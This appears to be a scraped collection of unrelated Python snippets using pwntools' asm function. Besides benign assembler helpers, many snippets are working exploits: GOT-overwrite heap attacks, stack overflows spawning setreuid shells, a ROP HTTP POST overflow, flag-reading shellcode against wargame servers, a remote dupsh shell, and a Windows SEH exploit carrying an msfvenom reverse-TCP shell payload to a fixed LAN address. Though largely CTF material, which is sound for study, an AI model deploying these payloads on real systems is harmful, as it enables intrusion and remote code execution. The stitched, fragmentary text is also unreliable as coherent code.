Esempio n. 1
0
	def encode(self,raw_sc,addr_in_reg='rax',pre_len=0,is_rdi_zero=0):
		r'''
		raw_sc:需要encode的机器码
		addr_in_reg: 指向shellcode附近的寄存器名称,默认rax
		pre_len:因为默认rax指向shellcode附近,这个字段的意思为 reg+pre_len == encoder的起始地址,默认0
		is_rdi_zero: 跑shellcode之前rdi是否为0,如果确定为0,可以设置此flag为1,这样可以省去几byte空间,默认0即rdi不为0
		encoder_len:留给encoder的最大字节长度(会自动调整)

		地址构成:
		rax --> xxxxx  \
				xxxxx  | pre_len (adjust addr to rax)
				xxxxx  /
		encoder yyyyy  \
				yyyyy  | encoder_len
				yyyyy  /
		your_sc	zzzzz  \
				zzzzz  | encoded shellcode
				zzzzz  |
				zzzzz  /
		'''
		save_log_level = context.log_level
		context.log_level = 99

		if not is_rdi_zero:
			self.prologue = self.zero_rdi+self.init_encoder
		else:
			self.prologue = self.init_encoder
		
		addr_in_reg=addr_in_reg.lower()
		if addr_in_reg != 'rax':
			if addr_in_reg not in self.vaild_reg:
				print '[-] not vaild reg'
				return None
			else:
				self.prologue=asm('push {};pop rax;\n'.format(addr_in_reg))+self.prologue

		self.raw_sc = raw_sc
		self.pre_len = pre_len
		self.encoder_len=len(self.prologue)
		if not self.encode_raw_sc():
			print '[-] error while encoding raw_sc'
			return None
		while True:
			debug('AE64: trying length {}'.format(self.encoder_len))
			encoder = asm(self.gen_encoder(self.pre_len+self.encoder_len))
			final_sc = self.prologue+encoder
			if self.encoder_len >= len(final_sc) and self.encoder_len-len(final_sc) <= 6:# nop len
				break
			self.encoder_len=len(final_sc)
		nop_len = self.encoder_len - len(final_sc)
		context.log_level = save_log_level

		success('shellcode generated, length info -> prologue:{} + encoder:{} + nop:{} + encoded_sc:{} == {}'.format(
			len(self.prologue),
			len(final_sc)-len(self.prologue),
			nop_len,
			len(self.enc_raw_sc),
			len(final_sc)+nop_len+len(self.enc_raw_sc)))
		final_sc += self.nop2*(nop_len/2)+self.nop*(nop_len%2)+self.enc_raw_sc
		return final_sc
def start():
    global s, p, ShellCode, i, user
    ShellCode = pwn.asm(
                pwn.shellcraft.i386.linux.setreuid(int('1400'+str(i+1))) + 
                pwn.shellcraft.i386.linux.sh()
    )
    s=connexion()
Esempio n. 3
0
def asm(ASM):
    if ASM in dict_asm:
        return dict_asm[ASM]
    else:
        code = pwn.asm(ASM)
        dict_asm[ASM] = code
        return code
Esempio n. 4
0
def attack():
    pr = pwn.process([remote_binary], cwd=os.path.dirname(remote_binary))
    try:
        elf = pwn.ELF(remote_binary, False)
        payload = pwn.p32(elf.got["exit"] - 12)

        pr.readline()
        fullname = int(pr.readline())

        # fullname
        shellcode = pwn.asm(
            "jmp skip;" + "nop;" * 100 +
            "{} skip: nop;".format(pwn.shellcraft.i386.linux.sh())).ljust(672 -
                                                                          4)
        shellcode += pwn.p32(73).ljust(72)
        shellcode += pwn.p32(0x101)
        print(pwn.hexdump(shellcode))
        print("shellcode length:", len(shellcode))
        pr.writelineafter("Input fullname\n", shellcode)

        # lastname
        payload = pwn.p32(0x101)  # set size to 0
        payload += pwn.p32(elf.got["exit"] - 12) + pwn.p32(fullname + 8)
        payload = payload.ljust(256 - 4)
        payload = "A" * (256 - 4) + payload + pwn.p32(0x101)  # set size to 0

        print(pwn.hexdump(payload))
        print("payload length:", len(payload))
        pr.writelineafter("Input lastname\n", payload)
        pr.interactive()
    finally:
        pr.close()
def get_payload(flag_id, shell):
    # Create the payload
    context.arch = 'amd64'
    craft = shellcraft.amd64

    rop = pack('<Q', 0x00000000004027d9)   # jmp rsp ; ret
    if shell:
        shellcode = craft.linux.sh()
    else:
        shellcode = 'sub rsp, 255\n' # To handle struct stat
        shellcode += readfile( 
                "doc_root/htpass/%s" % b64enc(sha1(flag_id).digest()),
                1
                )                       # send the file to stdout
        shellcode += craft.linux.syscall('SYS_exit', 0)

    rop += asm(shellcode)

    for c in ['&', '\r', '\n']:
        if c in rop:
            print "Found %x in the shellcode" % ord(c)
            sys.exit(2)

    payload = "POST /test HTTP/1.0\r\n\r\nusername=%s&secret=%s&pass=%s\r\n"% \
            (_USER_, "A"*0xb8 + rop, _PASS_)
    return payload
Esempio n. 6
0
def exploit():
    try:
        vortex4_uid = pwd.getpwnam('vortex4').pw_uid
    except KeyError:
        raise ExploitFailedError('user vortex4 does not exist')

    pwn.context(arch='i386', os='linux')

    print 'generating shellcode...',

    shellcode = pwn.asm(
        pwn.shellcraft.setreuid(vortex4_uid) + pwn.shellcraft.sh())
    '''
    @[0x80482a4]:
        - the virtual address of the (r_offset) field in the dynamic relocation
          table entry for glibc's exit()
    '''
    ptr2exitgotslot = struct.pack("<I", 0x80482a4)

    # 132 = sizeof(vulnerable buffer) + sizeof(the pointer named tmp)
    expegg = shellcode + '\x41' * (132 - len(shellcode)) + ptr2exitgotslot

    print '[done]'
    print 'trying to expl0it the vulnerable process'

    exit_stat = subprocess.call(['/vortex/vortex3', expegg])
    if exit_stat != os.EX_OK:
        raise ExploitFailedError(
            'failed to exploit the target vulnerable process')
Esempio n. 7
0
 def asm(self, src, args):
     text = ' '.join(args)
     try:
         res = pwn.asm(text).encode('string_escape')
         self.send(src, res)
     except Exception, e:
         self.send(src, str(e).encode('string_escape'))
Esempio n. 8
0
def get_payload(flag_id, shell):
    # Create the payload
    context.arch = 'amd64'
    craft = shellcraft.amd64

    rop = pack('<Q', 0x00000000004027d9)   # jmp rsp ; ret
    if shell:
        shellcode = craft.linux.sh()
    else:
        shellcode = 'sub rsp, 255\n' # To handle struct stat
        shellcode += readfile( 
                "doc_root/htpass/%s" % b64enc(sha1(flag_id).digest()),
                1
                )                       # send the file to stdout
        shellcode += craft.linux.syscall('SYS_exit', 0)

    rop += asm(shellcode)

    for c in ['&', '\r', '\n']:
        if c in rop:
            print "Found %x in the shellcode" % ord(c)
            sys.exit(2)

    payload = "POST /test HTTP/1.0\r\n\r\nusername=%s&secret=%s&pass=%s\r\n"% \
            (_USER_, "A"*0xb8 + rop, _PASS_)
    return payload
Esempio n. 9
0
def asm8086(code):
    s = pwn.asm(code)
    if s[0] == "\x66":
        s = s[1:]
    elif len(s) > 1 and s[0] == "\x67\x66":
        s = s[2:]
    return s
Esempio n. 10
0
def asmit(code, b=64):
    arch = 'i386'
    if b == 64:
        arch = 'amd64'
    if code in asm_memo:
        return asm_memo[code]
    asm_memo[code] = pwn.asm(code, arch=arch)
    return asm_memo[code]
Esempio n. 11
0
def main() -> None:
    arguments = parse_args()
    with pwn.context.local(arch=arguments.architecture,
                           endianness=arguments.endianness,
                           bits=arguments.bits):
        assembly_code = get_assembly_code(arguments.shellcode_path)
        assembled_shellcode = pwn.asm(assembly_code)
        Path(arguments.output_file).write_bytes(assembled_shellcode)
Esempio n. 12
0
def make_trans_struct(asm_instr):
    code = pwn.asm(asm_instr)
    code_str = "{" + ", ".join(str(byte) for byte in code) + "}"

    if len(code) > MAX_INSTRLEN:
        raise ValueError("instruction too long")

    return "{%s, %d}," % (code_str, len(code))
Esempio n. 13
0
def asm(code):
    global asm_memo

    digest = hashlib.sha1(code).digest()
    if digest in asm_memo:
        return asm_memo[digest]
    asm_memo[digest] = pwn.asm(code, arch='amd64')
    return asm_memo[digest]
Esempio n. 14
0
def encode_instructions(asm_str):
    shellcode = pwn.asm(asm_str)

    if len(shellcode) > 4:
        pwn.log.error(
            'shellcode {shellcode} is too long, shorten it to 4 bytes or less'.
            format(shellcode=shellcode))
    return pwn.u32(shellcode.ljust(4, b'\x00'))
Esempio n. 15
0
 def get_first_inst_length(self, vaddr):
     return len(
         pwn.asm(pwn.disasm(self.ELFobj.read(vaddr, 16),
                            offset=0,
                            byte=0,
                            arch=self.ELFobj.arch).split('\n')[0],
                 arch=self.ELFobj.arch,
                 vma=vaddr))
Esempio n. 16
0
def assemble_raw(inst_list, arch, convert_to_hex):
    # pylint doesn't see the arch argument
    # pylint: disable=unexpected-keyword-arg
    assembled = asm('\n'.join(inst_list), arch=arch)
    ret = [val for i, val in enumerate(assembled)]
    if convert_to_hex:
        for i, val in enumerate(ret):
            ret[i] = '0x%s' % binascii.hexlify(val)
    return ret
Esempio n. 17
0
def _asm(text):
  if text in cache:
    return cache[text]
  else:
    with open('uncached.txt','a') as f:
      f.write(text+'\n')
    code = pwn.asm(text)
    cache[text] = code
    return code
Esempio n. 18
0
def first_attempt(remote):
    shellcode = pwn.asm(pwn.shellcraft.sh())
    length_before_exit_address = 0x14
    padding = length_before_exit_address - len(shellcode)
    assert padding >= 0, padding
    retn_address = 0x0804809C
    payload = shellcode + b'A' * padding + pwn.p32(retn_address)
    remote.send(payload)
    remote.interactive()
Esempio n. 19
0
def encode(sh):
    sys.stderr.write('encoding len(sh) = %d\n' % len(sh))
    step = 4
    while len(sh) % step != 0:
        sh += '\x00'

    vs = []  # len = 6
    for i in reversed(range(0, len(sh), step)):
        v = 0
        for j in reversed(range(step)):
            v *= 0x100
            v += ord(sh[i + j])
        vs.append(v)

    code = ''
    code += '''
        push esi
        pop eax
        push esi
        pop ebx
        sub eax, 0x33333334
        push eax
        pop esi
    '''
    # esi = 0xCCCCCCCC, ebx = 0

    code += seteax(0x80000800)
    code += '''
        push eax
        pop esp
    '''

    for v in vs:
        code += seteax(v)
        code += 'push eax\n'

    code += seteax(0x80000900)  # so 00 00 doesn't segfault

    # clear stack
    code += 'push ebx\n'

    a = pwn.asm(code, arch='i386')
    if len(a) > LEN:
        sys.stderr.write('asm too long\n')
        exit(1)
    while len(a) < LEN:
        a += 'A'  # inc ecx

    for c in list(a):
        if not is_ascii(ord(c)):
            sys.stderr.write('Internal error: contains 0x%x!\n' % ord(c))
            exit(1)
    a += chr(0x90)  # nop

    return a
Esempio n. 20
0
def main():
	pwn.context(arch='amd64', os='linux')
	mssh = pwn.ssh(host='pwnable.kr', user='******', password='******', port=2222)
	attack = mssh.connect_remote('0.0.0.0', 9026)
	shellcode = pwn.shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
	shellcode += pwn.shellcraft.open('rsp', 0, 0)
	shellcode += pwn.shellcraft.read('rax', 'rsp', 1024)
	shellcode += pwn.shellcraft.write(1, 'rsp', 1024)
	attack.recvuntil('give me your x64 shellcode: ')
	attack.send(pwn.asm(shellcode))
	print attack.recvall()
Esempio n. 21
0
def otherleakHeapByFtp(r, ftpd, shellcode=""):
    filename = b'A' * 4
    filename += s.pack('<I', 0x7fff7020)
    filename += b'A' * (3 * 4)
    asm = pwn.asm(shellcode)
    info("Stage1 len:", len(asm))
    asm += b'A' * (154 - len(asm))
    filename += asm
    sendFtpPkt(r, u=b'u' * 16, p=b'p' * 16, filename=filename)
    doSlowFtp(ftpd.next_connection())
    addr = doLeakyFtp(ftpd.next_connection())
    return addr
Esempio n. 22
0
def _clookup_real(consts):
    import string
    magic = pwn.randoms(32, only = string.ascii_lowercase)
    magic_ = '\n%s\n' % magic
    dat = magic_.join([''] + consts)

    output = pwn.asm(dat, emit_asm = 1)
    output_ = [line.strip() for line in output.split(magic)]

    if len(output_) != len(consts) + 1:
        raise Exception("Unknown output format:\n%s" % output)

    return output_[1:]
Esempio n. 23
0
    def assemble(self, code):
        """Return binary code

        Args:
            code: A string, assembly code like 'mov eax, ebx'

        Return:
            A String, binary code compiled with pwn.asm()
        """
        if self.arch in EmuConstant.SUPPORT_ARCH:
            return asm(code, arch=EmuConstant.SUPPORT_ARCH[self.arch])
        else:
            raise UnsupportedArchException(EmuConstant.SUPPORT_ARCH[self.arch])
Esempio n. 24
0
def main():
    pwn.context(arch='i386', os='linux', endian='little', word_size=32)
    remote = pwn.remote('chall.pwnable.tw', 10001)
    remote.recvuntil("Give my your shellcode:")
    
    shellcode = pwn.asm(
        pwn.shellcraft.open('/home/orw/flag') +
        pwn.shellcraft.read('eax', 'esp', 0x1000) +
        pwn.shellcraft.write(1, 'esp', 'eax')
    )
    assert len(shellcode) <= 0xC8, len(shellcode)
    remote.send(shellcode)
    print("Flag: %s" % remote.recv().rstrip().decode('utf8'))
    remote.close()
Esempio n. 25
0
def assemble(address, code):
    try:
        # Get the current architecture from pwndbg
        context.update(arch=pwndbg.arch.current, os='linux')
    except:
        raise ValueError("Unsupported architecture: {pwndbg.arch.current}")

    # Check if the address is mapped
    if not pwndbg.memory.poke(address):
        try:
            # mmap a new page at the specified address
            mapped_addr = long(
                str(
                    gdb.parse_and_eval('mmap(0x%x, 0x1000, 7, 0x32, -1, 0)' %
                                       address)), 16)
        except pwndbg.gdb.error:
            # Handle binaries where symbol for mmap is not loaded
            raise Exception(
                "Address %s is not mapped and mmap symbol not in current context"
                % hex(address))

        # mmap returns -1 on failure, we check for 32b and 64b -1
        if mapped_addr == 0xffffffffffffffff or mapped_addr == 0xffffffff:
            raise Exception("Call to mmap with address 0x%x failed" % address)

        print("Mapped new memory region at 0x%x" % mapped_addr)

        # Update address where we'll write instructions
        address = mapped_addr

    # Prompt for instructions when code arg is not supplied
    if not code:
        print("Enter assembly instructions one per line")
        print("Enter 'EOF' when done")
        while True:
            ins = input('> ')
            if 'EOF' in ins:
                break
            code += ins + '\n'

    try:
        # Assemble the instructions
        asm_str = asm(code)
    except PwnlibException as e:
        # Handle bad instructions
        raise Exception("Failed to assemble. Check your instructions.")

    # Write the assembled code to the specified address
    pwndbg.memory.write(address, asm_str)
Esempio n. 26
0
def init(payload, lib, base):
    LIB_SIZE = align(len(lib))

    # initialize unicorn emulator
    mu = Uc(UC_ARCH_X86, UC_MODE_32)
    mu.mem_map(ADDRESS, 0x1000)
    mu.mem_map(base, LIB_SIZE)
    mu.mem_map(STACK_BASE, STACK_SIZE)
    mu.mem_map(DEST, 0x1000)

    mu.reg_write(UC_X86_REG_ESP, STACK_BASE + STACK_SIZE / 2)
    mu.mem_write(ADDRESS, asm('ret'))
    mu.mem_write(base, lib)
    mu.mem_write(mu.reg_read(UC_X86_REG_ESP), payload)
    return mu
Esempio n. 27
0
    def patch(self, vaddr, asm=None, byte=None, c=None):
        '''
        通过汇编代码或是byte或是c代码的方式打patch
        '''
        addr = self._vaddr_to_offset(vaddr)
        if asm is not None:
            self.mem[addr:] = pwn.asm(asm, arch=self.ELFobj.arch)
        elif byte is not None:
            self.mem[addr:] = byte
        elif c is not None:
            self.mem[addr:] = self._c2asm(c, vaddr)
        else:
            # Do nothing.
            pass

        success_log("patch @ 0x%x(0x%x)" % (vaddr, addr))
Esempio n. 28
0
    def check_jcc(self, asm_code, jcc=None):
        # TODO: this does not work now!
        """

        :param state:
        :param jcc:
        :return:
        """

        self.state = self.run_asm(asm_code)

        state = self.state
        add_options = self.add_options
        engine = self.engine

        feasible = []
        infeasible = []
        if jcc:
            pending = {jcc}
        else:
            pending = jcc_s

        for jcc in pending:
            asm_code = 'target:; {} target; '.format(jcc)
            jmp_code = pwn.asm(asm_code)
            code_size = len(jmp_code)

            addr = state.regs.eip.args[0]
            irsb = pyvex.IRSB(jmp_code, addr, archinfo.ArchX86(), code_size)
            # irsb.pp()

            # we simulate the ins and get the successor state
            simsucc = engine.process(state, irsb, inline=False)
            succ = simsucc.successors[0]

            # judge the jcc by the successor state
            eip = succ.regs.eip.args[0]
            if eip == addr:
                feasible.append(jcc)
            elif eip == addr + code_size:
                infeasible.append(jcc)
            else:
                print("impossible eip")
                raise Exception("impossible eip!")

        print(("feasible:\n{}".format('\t'.join(feasible))))
        print(("infeasible:\n{}".format('\t'.join(infeasible))))
def get_payload():
    # Create the payload
    context.arch = 'amd64'
    craft = shellcraft.amd64

    rop = pack('<Q', 0x00000000004027d9)   # jmp rsp ; ret
    shellcode = craft.linux.sh()

    rop += asm(shellcode)

    for c in ['&', '\r', '\n']:
        if c in rop:
            print "Found %x in the shellcode" % ord(c)
            sys.exit(2)

    payload = "POST /test HTTP/1.0\r\n\r\nusername=%s&secret=%s&pass=%s\r\n"% \
            (_USER_, "A"*0xb8 + rop, _PASS_)
    return payload
Esempio n. 30
0
def attack():
    pr = pwn.process([remote_binary, 'A'], cwd=os.path.dirname(remote_binary))
    try:
        elf = pwn.ELF(remote_binary, False)
        payload = pwn.p32(elf.got["exit"] - 12)

        pr.readline()
        first = int(pr.readline())
        print("first:", first)

        payload += pwn.p32(first + 8)
        payload += pwn.asm("push {};ret;".format(elf.sym["win"]))
        pr.writeline("A")
        pr.writelineafter("an overflow will not be very useful...\n", payload)
        rsp = pr.readall(timeout=0.5)
        print(rsp)
    finally:
        pr.close()
Esempio n. 31
0
def excption_0():
    import claripy

    ins_code = "mov eax,-1 ; test eax,eax"
    address = 0x76fcbcfe

    encoding = pwn.asm(ins_code)
    count = len(encoding)
    print((str(encoding)))
    print(count)

    add_options = {angr.options.NO_SYMBOLIC_SYSCALL_RESOLUTION,
                   angr.options.LAZY_SOLVES,
                   angr.options.INITIALIZE_ZERO_REGISTERS,
                   angr.options.SIMPLIFY_REGISTER_WRITES,
                   angr.options.SIMPLIFY_MEMORY_WRITES,
                   # angr.options.CONCRETIZE,
                   # angr.options.FAST_MEMORY
                   }

    bc_arr = ""
    bc_arr = encoding

    irsb = pyvex.IRSB(bc_arr, 0x76fcbcfe, archinfo.ArchX86(), len(bc_arr))

    state = SimState(arch='X86', add_options=add_options)
    state.regs.eax = 0x5a4d
    state.regs.esi = 0x753e0001
    state.regs.esp = 0x12f8c0
    state.regs.eip = 0x76fcbcfe

    taint_len = 0x8000
    # taint_len = 0xd4000

    state.memory.store(0x753e0000, claripy.BVS(
        "TAINT_MapView", taint_len * 8), endness="Iend_LE")

    engine = angr.SimEngineVEX()

    irsb.pp()
    engine.process(state, irsb, inline=True)
Esempio n. 32
0
def generate_payload():
    # gadgets found using ropper --ppr
    # filtered to the ones with addresses that can be used as ~NOPs
    # 00460023 -> and eax, [eax] <- exception on NULL access :(
    # 004600c5 -> lds eax, [eax] <- exception on NULL access :(
    # 004D00b5 -> mov ch, 0x0; dec ebp; \x00 <- winner, doesn't break execution

    GADGET_ADDR = "\xb5\x4d"
    NOP = "\xEB"  # EB00 translates to JMP $+2, 00EB to ADD BL,CH
    ALIGNMENT = "\x65"  # 3-byte alignment

    # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.15.101 LPORT=4444 -a x86 --platform windows BufferRegister=EAX EXITFUNC=seh --encoder x86/unicode_mixed
    shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB9lwx2bkPKPM0OpQywu01y0Pd2kpPP0rkPRLLdKb2kdDKSBMXjoH7OZMVnQYoVLMlOqCLJbLlkp7QvoZmZaFgzB8r0R27dKQBZp2kpJmlTKNlN1D8GsmxjaxQB1RkR9mPYqfsDKq9khGslzPIDKNTTKja8VmaKOvL5qvoZmJawWp8iPD5HvkSam9hOKQmMT0uXdR84KpXktzaiC2FdKzlNktKOhMLiqfsBkItBkYqJ02iPDldmTqKok311Iojr1KO7pqOaOQJdKLRzK2mQM38P3Mb9pypPhrWsCLr1OqDrH0LagO6KWioiEfX60M1m0ipmY6dQDB01XmYe0bKipYo9E0PB0npnpMpr0mpnpS8jJZoiOK0YoxUDWaZM5oxEpG8zopeBHYr9pkaolSYZFQZN0aFr7c8eIW5PtPaIoJ5reY0PtJlkOnn9xcEhlphHpX5tbR6IohU2HbCrMRDYpqygsqGnw1GMaHv0jmBR9r6IRKMRFGWq4ldMljaIqDM0Do4LPy6KP0DQDB0PVr6nv0Fb6Nn26nvpSOfBHSIvlMocVYo9E4IWpnnQFoV9oLp2HzhDGkmC09oYEEkkNjnlrjJoxEVDUgMCmkO8UmlkVCLKZE0YkiPbUJeukmwjs2RPobJYpr3io8UAA"

    filler = ""
    filler += NOP * 87
    filler += ALIGNMENT
    filler += shellcode
    filler += NOP * (9197 - len(filler))

    payload = filler + (NOP * 2) + GADGET_ADDR

    setup = ""
    setup += ALIGNMENT
    setup += pwn.asm("push ebp")  # to calculate ofset to shellcode
    setup += ALIGNMENT  # another 3-byte, as previous op was 1 byte
    setup += pwn.asm("pop eax")  # use eax as mov eax is most convenient later
    setup += ALIGNMENT
    setup += "\x05\x01\x41"  # add eax, 0x41003B00
    setup += ALIGNMENT
    setup += "\x2D\x3B\x41"  # sub eax, 0x41000100
    setup += ALIGNMENT
    setup += pwn.asm("inc eax")
    setup += ALIGNMENT
    setup += pwn.asm("inc eax")
    setup += ALIGNMENT
    setup += pwn.asm("inc eax")
    setup += ALIGNMENT
    setup += pwn.asm("push eax")
    setup += ALIGNMENT
    setup += pwn.asm("ret")

    return payload + setup
Esempio n. 33
0
    print p.recvline()
else:
    p = pwn.process('./www')

_ = p.recvline()

buffer_line = p.recvline().rstrip('\n')
m = re.match(r"buffers at 0x([a-f0-9]+) and 0x([a-f0-9]+)", buffer_line)
b1_address = int(m.group(1), 16)
b2_address = int(m.group(2), 16)
pwn.log.info("Buffers at {:08x} and {:08x}".format(b1_address, b2_address))

# 16 bytes of local buffer, 9 bytes of canary, 0xc bytes of local crud
OVERFLOW_SIZE = 16 + 9 + 0xc

shellcode = pwn.asm(pwn.shellcraft.i386.linux.sh())
if '\x00' in shellcode:
    raise Exception("Null byte in shellcode.")
if len(shellcode) > OVERFLOW_SIZE:
    raise Exception("Shellcode too long.")


b1 = ""
b1 += shellcode.rjust(OVERFLOW_SIZE, 'a')
b1 += pwn.p32(0xdeadbeef)  # ebp control
b1 += pwn.p32(b1_address)  # eip control
b1 += pwn.p32(CANARY)  # copy dest address
b1 += pwn.p32(b2_address)  # copy source address

b2 = b1[16:]
Esempio n. 34
0
 def __flat__(self):
     return pwn.asm(self)
Esempio n. 35
0
import pwn

conn = pwn.remote('104.196.61.88', 2831)

preamble = pwn.asm('mov eax, [esp+4]')
shellcode = pwn.asm(pwn.shellcraft.i386.linux.dupsh(sock='eax'))

conn.send(preamble + shellcode)

conn.interactive()